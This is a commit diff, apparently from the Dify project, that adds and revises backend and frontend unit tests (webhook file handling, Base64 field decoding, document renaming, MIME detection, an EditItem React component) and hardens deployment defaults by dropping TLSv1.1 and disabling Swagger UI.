graph_runtime_state=runtime_state,
)
# Provide tenant_id for conversion path
runtime_state.app_config = type("_AppCfg", (), {"tenant_id": "1"})()
# Compatibility alias for some nodes referencing `self.node_id`
node.node_id = node.id
return node
@ -246,20 +256,27 @@ def test_webhook_node_run_with_file_params():
"query_params": {},
"body": {},
"files": {
"upload": file1,
"document": file2,
"upload": file1.to_dict(),
"document": file2.to_dict(),
},
}
},
)
node = create_webhook_node(data, variable_pool)
result = node._run()
# Mock the file factory to avoid DB-dependent validation on upload_file_id
with patch("factories.file_factory.build_from_mapping") as mock_file_factory:
def _to_file(mapping, tenant_id, config=None, strict_type_validation=False):
return File.model_validate(mapping)
mock_file_factory.side_effect = _to_file
result = node._run()
assert result.status == WorkflowNodeExecutionStatus.SUCCEEDED
assert result.outputs["upload"] == file1
assert result.outputs["document"] == file2
assert result.outputs["missing_file"] is None
assert isinstance(result.outputs["upload"], FileVariable)
assert isinstance(result.outputs["document"], FileVariable)
assert result.outputs["upload"].value.filename == "image.jpg"
def test_webhook_node_run_mixed_parameters():
@ -291,19 +308,27 @@ def test_webhook_node_run_mixed_parameters():
"headers": {"Authorization": "Bearer token"},
"query_params": {"version": "v1"},
"body": {"message": "Test message"},
"files": {"upload": file_obj},
"files": {"upload": file_obj.to_dict()},
}
},
)
node = create_webhook_node(data, variable_pool)
result = node._run()
# Mock the file factory to avoid DB-dependent validation on upload_file_id
with patch("factories.file_factory.build_from_mapping") as mock_file_factory:
def _to_file(mapping, tenant_id, config=None, strict_type_validation=False):
return File.model_validate(mapping)
mock_file_factory.side_effect = _to_file
result = node._run()
assert result.status == WorkflowNodeExecutionStatus.SUCCEEDED
assert result.outputs["Authorization"] == "Bearer token"
assert result.outputs["version"] == "v1"
assert result.outputs["message"] == "Test message"
assert result.outputs["upload"] == file_obj
assert isinstance(result.outputs["upload"], FileVariable)
assert result.outputs["upload"].value.filename == "test.jpg"
assert "_webhook_raw" in result.outputs

View File

@ -1,3 +1,5 @@
from types import SimpleNamespace
import pytest
from core.file.enums import FileType
@ -12,6 +14,36 @@ from core.workflow.system_variable import SystemVariable
from core.workflow.workflow_entry import WorkflowEntry
@pytest.fixture(autouse=True)
def _mock_ssrf_head(monkeypatch):
"""Avoid any real network requests during tests.
file_factory._get_remote_file_info() uses ssrf_proxy.head to inspect
remote files. We stub it to return a minimal response object with
headers so filename/mime/size can be derived deterministically.
"""
def fake_head(url, *args, **kwargs):
# choose a content-type by file suffix for determinism
if url.endswith(".pdf"):
ctype = "application/pdf"
elif url.endswith(".jpg") or url.endswith(".jpeg"):
ctype = "image/jpeg"
elif url.endswith(".png"):
ctype = "image/png"
else:
ctype = "application/octet-stream"
filename = url.split("/")[-1] or "file.bin"
headers = {
"Content-Type": ctype,
"Content-Disposition": f'attachment; filename="{filename}"',
"Content-Length": "12345",
}
return SimpleNamespace(status_code=200, headers=headers)
monkeypatch.setattr("core.helper.ssrf_proxy.head", fake_head)
class TestWorkflowEntry:
"""Test WorkflowEntry class methods."""

View File

@ -0,0 +1,150 @@
"""
Unit tests for field encoding/decoding utilities.
These tests verify Base64 encoding/decoding functionality, including
proper error handling and fallback behavior.
"""
import base64
from libs.encryption import FieldEncryption
class TestDecodeField:
"""Test cases for field decoding functionality."""
def test_decode_valid_base64(self):
"""Test decoding a valid Base64 encoded string."""
plaintext = "password123"
encoded = base64.b64encode(plaintext.encode("utf-8")).decode()
result = FieldEncryption.decrypt_field(encoded)
assert result == plaintext
def test_decode_non_base64_returns_none(self):
"""Test that non-base64 input returns None."""
non_base64 = "plain-password-!@#"
result = FieldEncryption.decrypt_field(non_base64)
# Should return None (decoding failed)
assert result is None
def test_decode_unicode_text(self):
"""Test decoding Base64 encoded Unicode text."""
plaintext = "密码Test123"
encoded = base64.b64encode(plaintext.encode("utf-8")).decode()
result = FieldEncryption.decrypt_field(encoded)
assert result == plaintext
def test_decode_empty_string(self):
"""Test decoding an empty string returns empty string."""
result = FieldEncryption.decrypt_field("")
# Empty string base64 decodes to empty string
assert result == ""
def test_decode_special_characters(self):
"""Test decoding with special characters."""
plaintext = "P@ssw0rd!#$%^&*()"
encoded = base64.b64encode(plaintext.encode("utf-8")).decode()
result = FieldEncryption.decrypt_field(encoded)
assert result == plaintext
class TestDecodePassword:
"""Test cases for password decoding."""
def test_decode_password_base64(self):
"""Test decoding a Base64 encoded password."""
password = "SecureP@ssw0rd!"
encoded = base64.b64encode(password.encode("utf-8")).decode()
result = FieldEncryption.decrypt_password(encoded)
assert result == password
def test_decode_password_invalid_returns_none(self):
"""Test that invalid base64 passwords return None."""
invalid = "PlainPassword!@#"
result = FieldEncryption.decrypt_password(invalid)
# Should return None (decoding failed)
assert result is None
class TestDecodeVerificationCode:
"""Test cases for verification code decoding."""
def test_decode_code_base64(self):
"""Test decoding a Base64 encoded verification code."""
code = "789012"
encoded = base64.b64encode(code.encode("utf-8")).decode()
result = FieldEncryption.decrypt_verification_code(encoded)
assert result == code
def test_decode_code_invalid_returns_none(self):
"""Test that invalid base64 codes return None."""
invalid = "123456" # Plain 6-digit code, not base64
result = FieldEncryption.decrypt_verification_code(invalid)
# Should return None (decoding failed)
assert result is None
class TestRoundTripEncodingDecoding:
"""
Integration tests for complete encoding-decoding cycle.
These tests simulate the full frontend-to-backend flow using Base64.
"""
def test_roundtrip_password(self):
"""Test encoding and decoding a password."""
original_password = "SecureP@ssw0rd!"
# Simulate frontend encoding (Base64)
encoded = base64.b64encode(original_password.encode("utf-8")).decode()
# Backend decoding
decoded = FieldEncryption.decrypt_password(encoded)
assert decoded == original_password
def test_roundtrip_verification_code(self):
"""Test encoding and decoding a verification code."""
original_code = "123456"
# Simulate frontend encoding
encoded = base64.b64encode(original_code.encode("utf-8")).decode()
# Backend decoding
decoded = FieldEncryption.decrypt_verification_code(encoded)
assert decoded == original_code
def test_roundtrip_unicode_password(self):
"""Test encoding and decoding password with Unicode characters."""
original_password = "密码Test123!@#"
# Frontend encoding
encoded = base64.b64encode(original_password.encode("utf-8")).decode()
# Backend decoding
decoded = FieldEncryption.decrypt_password(encoded)
assert decoded == original_password
def test_roundtrip_long_password(self):
"""Test encoding and decoding a long password."""
original_password = "ThisIsAVeryLongPasswordWithLotsOfCharacters123!@#$%^&*()"
encoded = base64.b64encode(original_password.encode("utf-8")).decode()
decoded = FieldEncryption.decrypt_password(encoded)
assert decoded == original_password
def test_roundtrip_with_whitespace(self):
"""Test encoding and decoding with whitespace."""
original_password = "pass word with spaces"
encoded = base64.b64encode(original_password.encode("utf-8")).decode()
decoded = FieldEncryption.decrypt_field(encoded)
assert decoded == original_password
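
Taken together, these cases describe decode-or-None semantics; a minimal sketch consistent with them (assuming strict Base64 validation, which may differ from the real `FieldEncryption` internals):

```python
import base64
import binascii


def decode_field(encoded: str) -> str | None:
    """Base64-decode a frontend-supplied field; return None when decoding fails."""
    try:
        return base64.b64decode(encoded, validate=True).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError):
        return None


assert decode_field(base64.b64encode("SecureP@ssw0rd!".encode()).decode()) == "SecureP@ssw0rd!"
assert decode_field("plain-password-!@#") is None
assert decode_field("") == ""
```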

View File

@ -0,0 +1,176 @@
from types import SimpleNamespace
from unittest.mock import Mock, create_autospec, patch
import pytest
from models import Account
from services.dataset_service import DocumentService
@pytest.fixture
def mock_env():
"""Patch dependencies used by DocumentService.rename_document.
Mocks:
- DatasetService.get_dataset
- DocumentService.get_document
- current_user (with current_tenant_id)
- db.session
"""
with (
patch("services.dataset_service.DatasetService.get_dataset") as get_dataset,
patch("services.dataset_service.DocumentService.get_document") as get_document,
patch("services.dataset_service.current_user", create_autospec(Account, instance=True)) as current_user,
patch("extensions.ext_database.db.session") as db_session,
):
current_user.current_tenant_id = "tenant-123"
yield {
"get_dataset": get_dataset,
"get_document": get_document,
"current_user": current_user,
"db_session": db_session,
}
def make_dataset(dataset_id="dataset-123", tenant_id="tenant-123", built_in_field_enabled=False):
return SimpleNamespace(id=dataset_id, tenant_id=tenant_id, built_in_field_enabled=built_in_field_enabled)
def make_document(
document_id="document-123",
dataset_id="dataset-123",
tenant_id="tenant-123",
name="Old Name",
data_source_info=None,
doc_metadata=None,
):
doc = Mock()
doc.id = document_id
doc.dataset_id = dataset_id
doc.tenant_id = tenant_id
doc.name = name
doc.data_source_info = data_source_info or {}
# property-like usage in code relies on a dict
doc.data_source_info_dict = dict(doc.data_source_info)
doc.doc_metadata = dict(doc_metadata or {})
return doc
def test_rename_document_success(mock_env):
dataset_id = "dataset-123"
document_id = "document-123"
new_name = "New Document Name"
dataset = make_dataset(dataset_id)
document = make_document(document_id=document_id, dataset_id=dataset_id)
mock_env["get_dataset"].return_value = dataset
mock_env["get_document"].return_value = document
result = DocumentService.rename_document(dataset_id, document_id, new_name)
assert result is document
assert document.name == new_name
mock_env["db_session"].add.assert_called_once_with(document)
mock_env["db_session"].commit.assert_called_once()
def test_rename_document_with_built_in_fields(mock_env):
dataset_id = "dataset-123"
document_id = "document-123"
new_name = "Renamed"
dataset = make_dataset(dataset_id, built_in_field_enabled=True)
document = make_document(document_id=document_id, dataset_id=dataset_id, doc_metadata={"foo": "bar"})
mock_env["get_dataset"].return_value = dataset
mock_env["get_document"].return_value = document
DocumentService.rename_document(dataset_id, document_id, new_name)
assert document.name == new_name
# BuiltInField.document_name == "document_name" in service code
assert document.doc_metadata["document_name"] == new_name
assert document.doc_metadata["foo"] == "bar"
def test_rename_document_updates_upload_file_when_present(mock_env):
dataset_id = "dataset-123"
document_id = "document-123"
new_name = "Renamed"
file_id = "file-123"
dataset = make_dataset(dataset_id)
document = make_document(
document_id=document_id,
dataset_id=dataset_id,
data_source_info={"upload_file_id": file_id},
)
mock_env["get_dataset"].return_value = dataset
mock_env["get_document"].return_value = document
# Intercept UploadFile rename UPDATE chain
mock_query = Mock()
mock_query.where.return_value = mock_query
mock_env["db_session"].query.return_value = mock_query
DocumentService.rename_document(dataset_id, document_id, new_name)
assert document.name == new_name
mock_env["db_session"].query.assert_called() # update executed
def test_rename_document_does_not_update_upload_file_when_missing_id(mock_env):
"""
When data_source_info_dict exists but does not contain "upload_file_id",
UploadFile should not be updated.
"""
dataset_id = "dataset-123"
document_id = "document-123"
new_name = "Another Name"
dataset = make_dataset(dataset_id)
# Ensure data_source_info_dict is truthy but lacks the key
document = make_document(
document_id=document_id,
dataset_id=dataset_id,
data_source_info={"url": "https://example.com"},
)
mock_env["get_dataset"].return_value = dataset
mock_env["get_document"].return_value = document
DocumentService.rename_document(dataset_id, document_id, new_name)
assert document.name == new_name
# Should NOT attempt to update UploadFile
mock_env["db_session"].query.assert_not_called()
def test_rename_document_dataset_not_found(mock_env):
mock_env["get_dataset"].return_value = None
with pytest.raises(ValueError, match="Dataset not found"):
DocumentService.rename_document("missing", "doc", "x")
def test_rename_document_not_found(mock_env):
dataset = make_dataset("dataset-123")
mock_env["get_dataset"].return_value = dataset
mock_env["get_document"].return_value = None
with pytest.raises(ValueError, match="Document not found"):
DocumentService.rename_document(dataset.id, "missing", "x")
def test_rename_document_permission_denied_when_tenant_mismatch(mock_env):
dataset = make_dataset("dataset-123")
# different tenant than current_user.current_tenant_id
document = make_document(dataset_id=dataset.id, tenant_id="tenant-other")
mock_env["get_dataset"].return_value = dataset
mock_env["get_document"].return_value = document
with pytest.raises(ValueError, match="No permission"):
DocumentService.rename_document(dataset.id, document.id, "x")
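
The `mock_env` fixture leans on `create_autospec(Account, instance=True)`; in isolation the technique looks like this (toy class, not the real `Account` model):

```python
from unittest.mock import create_autospec


class Account:  # toy stand-in
    current_tenant_id = None

    def get_name(self) -> str:
        return "real name"


user = create_autospec(Account, instance=True)
user.current_tenant_id = "tenant-123"       # attributes can still be assigned freely
user.get_name.return_value = "Mocked Name"  # methods keep their real signatures

assert user.current_tenant_id == "tenant-123"
assert user.get_name() == "Mocked Name"
user.get_name.assert_called_once_with()
```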

View File

@ -518,6 +518,55 @@ class TestEdgeCases:
assert isinstance(result.result, StringSegment)
class TestTruncateJsonPrimitives:
"""Test _truncate_json_primitives method with different data types."""
@pytest.fixture
def truncator(self):
return VariableTruncator()
def test_truncate_json_primitives_file_type(self, truncator, file):
"""Test that File objects are handled correctly in _truncate_json_primitives."""
# Test File object is returned as-is without truncation
result = truncator._truncate_json_primitives(file, 1000)
assert result.value == file
assert result.truncated is False
# Size should be calculated correctly
expected_size = VariableTruncator.calculate_json_size(file)
assert result.value_size == expected_size
def test_truncate_json_primitives_file_type_small_budget(self, truncator, file):
"""Test that File objects are returned as-is even with small budget."""
# Even with a small size budget, File objects should not be truncated
result = truncator._truncate_json_primitives(file, 10)
assert result.value == file
assert result.truncated is False
def test_truncate_json_primitives_file_type_in_array(self, truncator, file):
"""Test File objects in arrays are handled correctly."""
array_with_files = [file, file]
result = truncator._truncate_json_primitives(array_with_files, 1000)
assert isinstance(result.value, list)
assert len(result.value) == 2
assert result.value[0] == file
assert result.value[1] == file
assert result.truncated is False
def test_truncate_json_primitives_file_type_in_object(self, truncator, file):
"""Test File objects in objects are handled correctly."""
obj_with_files = {"file1": file, "file2": file}
result = truncator._truncate_json_primitives(obj_with_files, 1000)
assert isinstance(result.value, dict)
assert len(result.value) == 2
assert result.value["file1"] == file
assert result.value["file2"] == file
assert result.truncated is False
class TestIntegrationScenarios:
"""Test realistic integration scenarios."""

View File

@ -82,19 +82,19 @@ class TestWebhookServiceUnit:
"/webhook",
method="POST",
headers={"Content-Type": "multipart/form-data"},
data={"message": "test", "upload": file_storage},
data={"message": "test", "file": file_storage},
):
webhook_trigger = MagicMock()
webhook_trigger.tenant_id = "test_tenant"
with patch.object(WebhookService, "_process_file_uploads") as mock_process_files:
mock_process_files.return_value = {"upload": "mocked_file_obj"}
mock_process_files.return_value = {"file": "mocked_file_obj"}
webhook_data = WebhookService.extract_webhook_data(webhook_trigger)
assert webhook_data["method"] == "POST"
assert webhook_data["body"]["message"] == "test"
assert webhook_data["files"]["upload"] == "mocked_file_obj"
assert webhook_data["files"]["file"] == "mocked_file_obj"
mock_process_files.assert_called_once()
def test_extract_webhook_data_raw_text(self):
@ -110,6 +110,70 @@ class TestWebhookServiceUnit:
assert webhook_data["method"] == "POST"
assert webhook_data["body"]["raw"] == "raw text content"
def test_extract_octet_stream_body_uses_detected_mime(self):
"""Octet-stream uploads should rely on detected MIME type."""
app = Flask(__name__)
binary_content = b"plain text data"
with app.test_request_context(
"/webhook", method="POST", headers={"Content-Type": "application/octet-stream"}, data=binary_content
):
webhook_trigger = MagicMock()
mock_file = MagicMock()
mock_file.to_dict.return_value = {"file": "data"}
with (
patch.object(WebhookService, "_detect_binary_mimetype", return_value="text/plain") as mock_detect,
patch.object(WebhookService, "_create_file_from_binary") as mock_create,
):
mock_create.return_value = mock_file
body, files = WebhookService._extract_octet_stream_body(webhook_trigger)
assert body["raw"] == {"file": "data"}
assert files == {}
mock_detect.assert_called_once_with(binary_content)
mock_create.assert_called_once()
args = mock_create.call_args[0]
assert args[0] == binary_content
assert args[1] == "text/plain"
assert args[2] is webhook_trigger
def test_detect_binary_mimetype_uses_magic(self, monkeypatch):
"""python-magic output should be used when available."""
fake_magic = MagicMock()
fake_magic.from_buffer.return_value = "image/png"
monkeypatch.setattr("services.trigger.webhook_service.magic", fake_magic)
result = WebhookService._detect_binary_mimetype(b"binary data")
assert result == "image/png"
fake_magic.from_buffer.assert_called_once()
def test_detect_binary_mimetype_fallback_without_magic(self, monkeypatch):
"""Fallback MIME type should be used when python-magic is unavailable."""
monkeypatch.setattr("services.trigger.webhook_service.magic", None)
result = WebhookService._detect_binary_mimetype(b"binary data")
assert result == "application/octet-stream"
def test_detect_binary_mimetype_handles_magic_exception(self, monkeypatch):
"""Fallback MIME type should be used when python-magic raises an exception."""
try:
import magic as real_magic
except ImportError:
pytest.skip("python-magic is not installed")
fake_magic = MagicMock()
fake_magic.from_buffer.side_effect = real_magic.MagicException("magic error")
monkeypatch.setattr("services.trigger.webhook_service.magic", fake_magic)
with patch("services.trigger.webhook_service.logger") as mock_logger:
result = WebhookService._detect_binary_mimetype(b"binary data")
assert result == "application/octet-stream"
mock_logger.debug.assert_called_once()
def test_extract_webhook_data_invalid_json(self):
"""Test webhook data extraction with invalid JSON."""
app = Flask(__name__)

View File

@ -1229,7 +1229,7 @@ NGINX_SSL_PORT=443
# and modify the env vars below accordingly.
NGINX_SSL_CERT_FILENAME=dify.crt
NGINX_SSL_CERT_KEY_FILENAME=dify.key
NGINX_SSL_PROTOCOLS=TLSv1.1 TLSv1.2 TLSv1.3
NGINX_SSL_PROTOCOLS=TLSv1.2 TLSv1.3
# Nginx performance tuning
NGINX_WORKER_PROCESSES=auto
@ -1421,7 +1421,7 @@ QUEUE_MONITOR_ALERT_EMAILS=
QUEUE_MONITOR_INTERVAL=30
# Swagger UI configuration
SWAGGER_UI_ENABLED=true
SWAGGER_UI_ENABLED=false
SWAGGER_UI_PATH=/swagger-ui.html
# Whether to encrypt dataset IDs when exporting DSL files (default: true)
@ -1461,4 +1461,4 @@ ANNOTATION_IMPORT_RATE_LIMIT_PER_HOUR=20
ANNOTATION_IMPORT_MAX_CONCURRENT=5
# The API key of amplitude
AMPLITUDE_API_KEY=
AMPLITUDE_API_KEY=

View File

@ -414,7 +414,7 @@ services:
# and modify the env vars below in .env if HTTPS_ENABLED is true.
NGINX_SSL_CERT_FILENAME: ${NGINX_SSL_CERT_FILENAME:-dify.crt}
NGINX_SSL_CERT_KEY_FILENAME: ${NGINX_SSL_CERT_KEY_FILENAME:-dify.key}
NGINX_SSL_PROTOCOLS: ${NGINX_SSL_PROTOCOLS:-TLSv1.1 TLSv1.2 TLSv1.3}
NGINX_SSL_PROTOCOLS: ${NGINX_SSL_PROTOCOLS:-TLSv1.2 TLSv1.3}
NGINX_WORKER_PROCESSES: ${NGINX_WORKER_PROCESSES:-auto}
NGINX_CLIENT_MAX_BODY_SIZE: ${NGINX_CLIENT_MAX_BODY_SIZE:-100M}
NGINX_KEEPALIVE_TIMEOUT: ${NGINX_KEEPALIVE_TIMEOUT:-65}

View File

@ -528,7 +528,7 @@ x-shared-env: &shared-api-worker-env
NGINX_SSL_PORT: ${NGINX_SSL_PORT:-443}
NGINX_SSL_CERT_FILENAME: ${NGINX_SSL_CERT_FILENAME:-dify.crt}
NGINX_SSL_CERT_KEY_FILENAME: ${NGINX_SSL_CERT_KEY_FILENAME:-dify.key}
NGINX_SSL_PROTOCOLS: ${NGINX_SSL_PROTOCOLS:-TLSv1.1 TLSv1.2 TLSv1.3}
NGINX_SSL_PROTOCOLS: ${NGINX_SSL_PROTOCOLS:-TLSv1.2 TLSv1.3}
NGINX_WORKER_PROCESSES: ${NGINX_WORKER_PROCESSES:-auto}
NGINX_CLIENT_MAX_BODY_SIZE: ${NGINX_CLIENT_MAX_BODY_SIZE:-100M}
NGINX_KEEPALIVE_TIMEOUT: ${NGINX_KEEPALIVE_TIMEOUT:-65}
@ -631,7 +631,7 @@ x-shared-env: &shared-api-worker-env
QUEUE_MONITOR_THRESHOLD: ${QUEUE_MONITOR_THRESHOLD:-200}
QUEUE_MONITOR_ALERT_EMAILS: ${QUEUE_MONITOR_ALERT_EMAILS:-}
QUEUE_MONITOR_INTERVAL: ${QUEUE_MONITOR_INTERVAL:-30}
SWAGGER_UI_ENABLED: ${SWAGGER_UI_ENABLED:-true}
SWAGGER_UI_ENABLED: ${SWAGGER_UI_ENABLED:-false}
SWAGGER_UI_PATH: ${SWAGGER_UI_PATH:-/swagger-ui.html}
DSL_EXPORT_ENCRYPT_DATASET_ID: ${DSL_EXPORT_ENCRYPT_DATASET_ID:-true}
DATASET_MAX_SEGMENTS_PER_REQUEST: ${DATASET_MAX_SEGMENTS_PER_REQUEST:-0}
@ -1072,7 +1072,7 @@ services:
# and modify the env vars below in .env if HTTPS_ENABLED is true.
NGINX_SSL_CERT_FILENAME: ${NGINX_SSL_CERT_FILENAME:-dify.crt}
NGINX_SSL_CERT_KEY_FILENAME: ${NGINX_SSL_CERT_KEY_FILENAME:-dify.key}
NGINX_SSL_PROTOCOLS: ${NGINX_SSL_PROTOCOLS:-TLSv1.1 TLSv1.2 TLSv1.3}
NGINX_SSL_PROTOCOLS: ${NGINX_SSL_PROTOCOLS:-TLSv1.2 TLSv1.3}
NGINX_WORKER_PROCESSES: ${NGINX_WORKER_PROCESSES:-auto}
NGINX_CLIENT_MAX_BODY_SIZE: ${NGINX_CLIENT_MAX_BODY_SIZE:-100M}
NGINX_KEEPALIVE_TIMEOUT: ${NGINX_KEEPALIVE_TIMEOUT:-65}

View File

@ -2,3 +2,4 @@
- Use `web/testing/testing.md` as the canonical instruction set for generating frontend automated tests.
- When proposing or saving tests, re-read that document and follow every requirement.
- All frontend tests MUST also comply with the `frontend-testing` skill. Treat the skill as a mandatory constraint, not optional guidance.

web/CLAUDE.md Symbolic link
View File

@ -0,0 +1 @@
AGENTS.md

View File

@ -0,0 +1,40 @@
/**
* Shared mock for react-i18next
*
* Jest automatically uses this mock when react-i18next is imported in tests.
* The default behavior returns the translation key as-is, which is suitable
* for most test scenarios.
*
* For tests that need custom translations, you can override with jest.mock():
*
* @example
* jest.mock('react-i18next', () => ({
* useTranslation: () => ({
* t: (key: string) => {
* if (key === 'some.key') return 'Custom translation'
* return key
* },
* }),
* }))
*/
export const useTranslation = () => ({
t: (key: string, options?: Record<string, unknown>) => {
if (options?.returnObjects)
return [`${key}-feature-1`, `${key}-feature-2`]
if (options)
return `${key}:${JSON.stringify(options)}`
return key
},
i18n: {
language: 'en',
changeLanguage: jest.fn(),
},
})
export const Trans = ({ children }: { children?: React.ReactNode }) => children
export const initReactI18next = {
type: '3rdParty',
init: jest.fn(),
}

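For illustration, a component test that relies on this shared mock needs no explicit `jest.mock('react-i18next', ...)` call: Jest picks the file up automatically, and `t()` returns the key itself, so assertions target translation keys. A minimal sketch, assuming a hypothetical Greeting component that renders `t('greeting.title')` (neither the component nor the key is part of this commit):

import { render, screen } from '@testing-library/react'
// No jest.mock('react-i18next', ...) needed: the shared mock above is auto-loaded by Jest.
import Greeting from './greeting'

describe('Greeting', () => {
  it('should render the translation key returned by the shared i18n mock', () => {
    // Act
    render(<Greeting />)
    // Assert - the shared mock's t() returns the key as-is
    expect(screen.getByText('greeting.title')).toBeInTheDocument()
  })
})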
View File

@ -4,12 +4,6 @@ import { fireEvent, render, screen, waitFor } from '@testing-library/react'
import MailAndPasswordAuth from '@/app/(shareLayout)/webapp-signin/components/mail-and-password-auth'
import CheckCode from '@/app/(shareLayout)/webapp-signin/check-code/page'
jest.mock('react-i18next', () => ({
useTranslation: () => ({
t: (key: string) => key,
}),
}))
const replaceMock = jest.fn()
const backMock = jest.fn()

View File

@ -4,12 +4,6 @@ import '@testing-library/jest-dom'
import CommandSelector from '../../app/components/goto-anything/command-selector'
import type { ActionItem } from '../../app/components/goto-anything/actions/types'
jest.mock('react-i18next', () => ({
useTranslation: () => ({
t: (key: string) => key,
}),
}))
jest.mock('cmdk', () => ({
Command: {
Group: ({ children, className }: any) => <div className={className}>{children}</div>,

View File

@ -3,13 +3,6 @@ import { render } from '@testing-library/react'
import '@testing-library/jest-dom'
import { OpikIconBig } from '@/app/components/base/icons/src/public/tracing'
// Mock dependencies to isolate the SVG rendering issue
jest.mock('react-i18next', () => ({
useTranslation: () => ({
t: (key: string) => key,
}),
}))
describe('SVG Attribute Error Reproduction', () => {
// Capture console errors
const originalError = console.error

View File

@ -3,12 +3,6 @@ import { fireEvent, render, screen, waitFor } from '@testing-library/react'
import CSVUploader, { type Props } from './csv-uploader'
import { ToastContext } from '@/app/components/base/toast'
jest.mock('react-i18next', () => ({
useTranslation: () => ({
t: (key: string) => key,
}),
}))
describe('CSVUploader', () => {
const notify = jest.fn()
const updateFile = jest.fn()

View File

@ -0,0 +1,397 @@
import { render, screen } from '@testing-library/react'
import userEvent from '@testing-library/user-event'
import EditItem, { EditItemType, EditTitle } from './index'
describe('EditTitle', () => {
it('should render title content correctly', () => {
// Arrange
const props = { title: 'Test Title' }
// Act
render(<EditTitle {...props} />)
// Assert
expect(screen.getByText(/test title/i)).toBeInTheDocument()
// Should contain edit icon (svg element)
expect(document.querySelector('svg')).toBeInTheDocument()
})
it('should apply custom className when provided', () => {
// Arrange
const props = {
title: 'Test Title',
className: 'custom-class',
}
// Act
const { container } = render(<EditTitle {...props} />)
// Assert
expect(screen.getByText(/test title/i)).toBeInTheDocument()
expect(container.querySelector('.custom-class')).toBeInTheDocument()
})
})
describe('EditItem', () => {
const defaultProps = {
type: EditItemType.Query,
content: 'Test content',
onSave: jest.fn(),
}
beforeEach(() => {
jest.clearAllMocks()
})
// Rendering tests (REQUIRED)
describe('Rendering', () => {
it('should render content correctly', () => {
// Arrange
const props = { ...defaultProps }
// Act
render(<EditItem {...props} />)
// Assert
expect(screen.getByText(/test content/i)).toBeInTheDocument()
// Should show item name (query or answer)
expect(screen.getByText('appAnnotation.editModal.queryName')).toBeInTheDocument()
})
it('should render different item types correctly', () => {
// Arrange
const props = {
...defaultProps,
type: EditItemType.Answer,
content: 'Answer content',
}
// Act
render(<EditItem {...props} />)
// Assert
expect(screen.getByText(/answer content/i)).toBeInTheDocument()
expect(screen.getByText('appAnnotation.editModal.answerName')).toBeInTheDocument()
})
it('should show edit controls when not readonly', () => {
// Arrange
const props = { ...defaultProps }
// Act
render(<EditItem {...props} />)
// Assert
expect(screen.getByText('common.operation.edit')).toBeInTheDocument()
})
it('should hide edit controls when readonly', () => {
// Arrange
const props = {
...defaultProps,
readonly: true,
}
// Act
render(<EditItem {...props} />)
// Assert
expect(screen.queryByText('common.operation.edit')).not.toBeInTheDocument()
})
})
// Props tests (REQUIRED)
describe('Props', () => {
it('should respect readonly prop for edit functionality', () => {
// Arrange
const props = {
...defaultProps,
readonly: true,
}
// Act
render(<EditItem {...props} />)
// Assert
expect(screen.getByText(/test content/i)).toBeInTheDocument()
expect(screen.queryByText('common.operation.edit')).not.toBeInTheDocument()
})
it('should display provided content', () => {
// Arrange
const props = {
...defaultProps,
content: 'Custom content for testing',
}
// Act
render(<EditItem {...props} />)
// Assert
expect(screen.getByText(/custom content for testing/i)).toBeInTheDocument()
})
it('should render appropriate content based on type', () => {
// Arrange
const props = {
...defaultProps,
type: EditItemType.Query,
content: 'Question content',
}
// Act
render(<EditItem {...props} />)
// Assert
expect(screen.getByText(/question content/i)).toBeInTheDocument()
expect(screen.getByText('appAnnotation.editModal.queryName')).toBeInTheDocument()
})
})
// User Interactions
describe('User Interactions', () => {
it('should activate edit mode when edit button is clicked', async () => {
// Arrange
const props = { ...defaultProps }
const user = userEvent.setup()
// Act
render(<EditItem {...props} />)
await user.click(screen.getByText('common.operation.edit'))
// Assert
expect(screen.getByRole('textbox')).toBeInTheDocument()
expect(screen.getByRole('button', { name: 'common.operation.save' })).toBeInTheDocument()
expect(screen.getByRole('button', { name: 'common.operation.cancel' })).toBeInTheDocument()
})
it('should save new content when save button is clicked', async () => {
// Arrange
const mockSave = jest.fn().mockResolvedValue(undefined)
const props = {
...defaultProps,
onSave: mockSave,
}
const user = userEvent.setup()
// Act
render(<EditItem {...props} />)
await user.click(screen.getByText('common.operation.edit'))
// Type new content
const textarea = screen.getByRole('textbox')
await user.clear(textarea)
await user.type(textarea, 'Updated content')
// Save
await user.click(screen.getByRole('button', { name: 'common.operation.save' }))
// Assert
expect(mockSave).toHaveBeenCalledWith('Updated content')
})
it('should exit edit mode when cancel button is clicked', async () => {
// Arrange
const props = { ...defaultProps }
const user = userEvent.setup()
// Act
render(<EditItem {...props} />)
await user.click(screen.getByText('common.operation.edit'))
await user.click(screen.getByRole('button', { name: 'common.operation.cancel' }))
// Assert
expect(screen.queryByRole('textbox')).not.toBeInTheDocument()
expect(screen.getByText(/test content/i)).toBeInTheDocument()
})
it('should show content preview while typing', async () => {
// Arrange
const props = { ...defaultProps }
const user = userEvent.setup()
// Act
render(<EditItem {...props} />)
await user.click(screen.getByText('common.operation.edit'))
const textarea = screen.getByRole('textbox')
await user.type(textarea, 'New content')
// Assert
expect(screen.getByText(/new content/i)).toBeInTheDocument()
})
it('should call onSave with correct content when saving', async () => {
// Arrange
const mockSave = jest.fn().mockResolvedValue(undefined)
const props = {
...defaultProps,
onSave: mockSave,
}
const user = userEvent.setup()
// Act
render(<EditItem {...props} />)
await user.click(screen.getByText('common.operation.edit'))
const textarea = screen.getByRole('textbox')
await user.clear(textarea)
await user.type(textarea, 'Test save content')
// Save
await user.click(screen.getByRole('button', { name: 'common.operation.save' }))
// Assert
expect(mockSave).toHaveBeenCalledWith('Test save content')
})
it('should show delete option when content changes', async () => {
// Arrange
const mockSave = jest.fn().mockResolvedValue(undefined)
const props = {
...defaultProps,
onSave: mockSave,
}
const user = userEvent.setup()
// Act
render(<EditItem {...props} />)
// Enter edit mode and change content
await user.click(screen.getByText('common.operation.edit'))
const textarea = screen.getByRole('textbox')
await user.clear(textarea)
await user.type(textarea, 'Modified content')
// Save to trigger content change
await user.click(screen.getByRole('button', { name: 'common.operation.save' }))
// Assert
expect(mockSave).toHaveBeenCalledWith('Modified content')
})
it('should handle keyboard interactions in edit mode', async () => {
// Arrange
const props = { ...defaultProps }
const user = userEvent.setup()
// Act
render(<EditItem {...props} />)
await user.click(screen.getByText('common.operation.edit'))
const textarea = screen.getByRole('textbox')
// Test typing
await user.type(textarea, 'Keyboard test')
// Assert
expect(textarea).toHaveValue('Keyboard test')
expect(screen.getByText(/keyboard test/i)).toBeInTheDocument()
})
})
// State Management
describe('State Management', () => {
it('should reset newContent when content prop changes', async () => {
// Arrange
const { rerender } = render(<EditItem {...defaultProps} />)
// Act - Enter edit mode and type something
const user = userEvent.setup()
await user.click(screen.getByText('common.operation.edit'))
const textarea = screen.getByRole('textbox')
